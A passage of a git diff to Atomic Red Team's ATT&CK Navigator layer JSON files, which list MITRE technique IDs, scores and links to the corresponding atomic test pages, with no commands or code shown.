Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1030","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1036","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1037","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1048","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}]},{"techniqueID":"T1049","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.001/T1053.001.md"}]},{"techniqueID":"T1053.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1053.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1053","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1056.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1059","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1074","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1078","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1082","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1087","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1098.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1098","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1105","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1110","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1132.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1132","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1136","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1140","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1222","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1484.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1484","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1497","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1518","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1548","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1552","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1556","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 0a7bcf39..a869ee3d 100644 
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@ -{"version":"4.3","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"},{"techniqueID":"T1018","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"},{"techniqueID":"T1027.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"},{"techniqueID":"T1027.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"},{"techniqueID":"T1027.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"},{"techniqueID":"T1027","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"},{"techniqueID":"T1030","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"},{"techniqueID":"T1033","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"},{"techniqueID":"T1036.005","sco
re":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"},{"techniqueID":"T1036.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1036","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"},{"techniqueID":"T1037.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.002/T1037.002.md"},{"techniqueID":"T1037.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"},{"techniqueID":"T1037.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1037","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.005/T1037.005.md"},{"techniqueID":"T1040","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"},{"techniqueID":"T1046","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"},{"techniqueID":"T1048.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"},{"techniqueID":"T1048","score":100
